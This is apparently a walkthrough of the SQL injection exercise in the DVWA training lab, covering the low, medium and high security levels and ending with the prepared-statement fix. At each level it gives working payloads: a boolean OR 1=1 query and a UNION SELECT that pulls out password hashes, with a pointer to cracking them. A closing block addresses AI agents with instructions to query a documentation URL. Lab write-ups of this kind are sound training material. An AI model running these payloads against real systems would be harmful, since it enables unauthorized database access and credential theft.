# SQL Injection
What is a SQL Injection? SQL injection is a type of security vulnerability that occurs when an attacker is able to manipulate a SQL query by injecting malicious SQL code into user-input fields or other parameters. This can happen when an application does not properly validate or sanitize user inputs before constructing SQL queries. SQL injection attacks are most common in web applications that interact with a database. When user inputs are directly concatenated into SQL queries without proper validation, an attacker can input specially crafted strings that alter the intended logic of the SQL query.
{% hint style="info" %} Using BurpSuite and the FoxyProxy extension is recommended. {% endhint %} ## Low We've an input type text that received an User ID in I by user and submit request using the Submit button:
This's our request captured by Burp Suite, while here below there's a php source code:

localhost/DVWA/vulnerabilities/view_source.php?id=sqli&security=low

How the same in the low level, there're not input sanitation, then we can send what we want into input type text field. In this case request will arrive to DB located into webserver, but query will be preparared using php language. Analyzing source code, we know that mysql query is: ```sql SELECT first_name, last_name FROM users WHERE user_id = '$id'; ``` #### 1st Payload Regarding query and that our input type value is insert into $id variable, if we want to see all rows of DB, we need to send a query request always boolean true (e.g. 1=1), in addition we can hide all parts not important using ' character. Then in this case, we can use following payload: `' OR 1=1 --` ```sql SELECT first_name, last_name FROM users WHERE user_id = '' OR 1=1 -- '; ``` in the where condition there're a first search to user with this id '' OR a true condition, plus a comment. This permit us to see all DB results:
#### 2nd Payload Regarding that query selects: first\_name, last\_name field from users table, we can use [UNION](https://www.w3schools.com/sql/sql_union.asp) operator to add a new query: `' UNION select first_name,password from users --` ```sql SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT first_name,password FROM users -- '; ```
We obtain hash of psw to eventually crack using tools such as: [Hashcat](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/hashcat) and [John The Ripper](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/john-the-ripper). Note: Every `SELECT` statement within `UNION` must have the same number of columns. {% hint style="warning" %} The input is not sanitized, so I can execute any (potentially malicious) command. {% endhint %} ## Medium Here, there're a select with range (1 to 5) to set User ID.
In addition to low level, in the code below there're an escape string control and query variable $ID isn't enclosed by ''.
Our request include an ID + Submit values.
But, we can modify ID value using Burp Suite repeater function:
#### 1st Payload Remembering that $ID variable isn't enclosed by '', escape string control isn't a matter. Then in this case, we can use following payload: `1 OR 1=1 --` ```sql SELECT first_name, last_name FROM users WHERE user_id = 1 OR 1=1 -- ; ``` in the where condition there're a first search to user with this id '' OR a true condition, plus a comment.
#### 2nd Payload How the low level, regarding that query selects: first\_name, last\_name field from users table, we can use [UNION](https://www.w3schools.com/sql/sql_union.asp) operator to add a new query: 1 `UNION select first_name,password from users --` ```sql SELECT first_name, last_name FROM users WHERE user_id = 1 UNION SELECT first_name,password FROM users -- '; ```
We obtain hash of psw to eventually crack using tools such as: [Hashcat](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/hashcat) and [John The Ripper](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/john-the-ripper). Note: Every `SELECT` statement within `UNION` must have the same number of columns. {% hint style="warning" %} The input is not sanitized, so I can execute any (potentially malicious) command. {% endhint %} ## High In this level clicking on first page, we obtain a redirect to a second page to submit effectively our Session ID:
#### 1st Payload In this case payload is always the same of low level, but we need to add it into second page, infact we've two request (GET and POST) However, we can use following payload: `1' OR 1=1 --` ```sql SELECT first_name, last_name FROM users WHERE user_id = '1' OR 1=1 -- '; ``` that permit us to see all DB results:
#### 2nd Payload How last levels, we can use [UNION](https://www.w3schools.com/sql/sql_union.asp) operator to add a new query: `' UNION select first_name,password from users --` ```sql SELECT first_name, last_name FROM users WHERE user_id = '' UNION SELECT first_name,password FROM users -- '; ```
We obtain hash of psw to eventually crack using tools such as: [Hashcat](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/hashcat) and [John The Ripper](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/john-the-ripper). Note: Every `SELECT` statement within `UNION` must have the same number of columns. {% hint style="warning" %} The input is not sanitized, so I can execute any (potentially malicious) command. {% endhint %} ## Impossible
The best solution is to sanitize query using a prepared statement, to delineate part static and dinamic (id) of query; take a binding parameter to check if is it an integer or char; insert a control to count rows number as result; and use a [CSRF](/dvwa-web/csrf.md) token. All this permits to separate sql code with sql data/parameter insert by user. ## References For the making of this solution the following resource were used: * {% content-ref url="/spaces/iS3hadq7jVFgSa8k5wRA/pages/mZTJKDwQNJa4ABUvs4kB" %} [15 - SQL Injection](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/main-contents/15-sql-injection) {% endcontent-ref %} {% content-ref url="/spaces/iS3hadq7jVFgSa8k5wRA/pages/I6MO9ncyNWdf8p38GGoz" %} [SQLMap](https://dev-angelist.gitbook.io/practical-ethical-hacker-ceh-tools/practical-ethical-hacker-notes/tools/sqlmap) {% endcontent-ref %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dev-angelist.gitbook.io/dvwa-web/sql-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.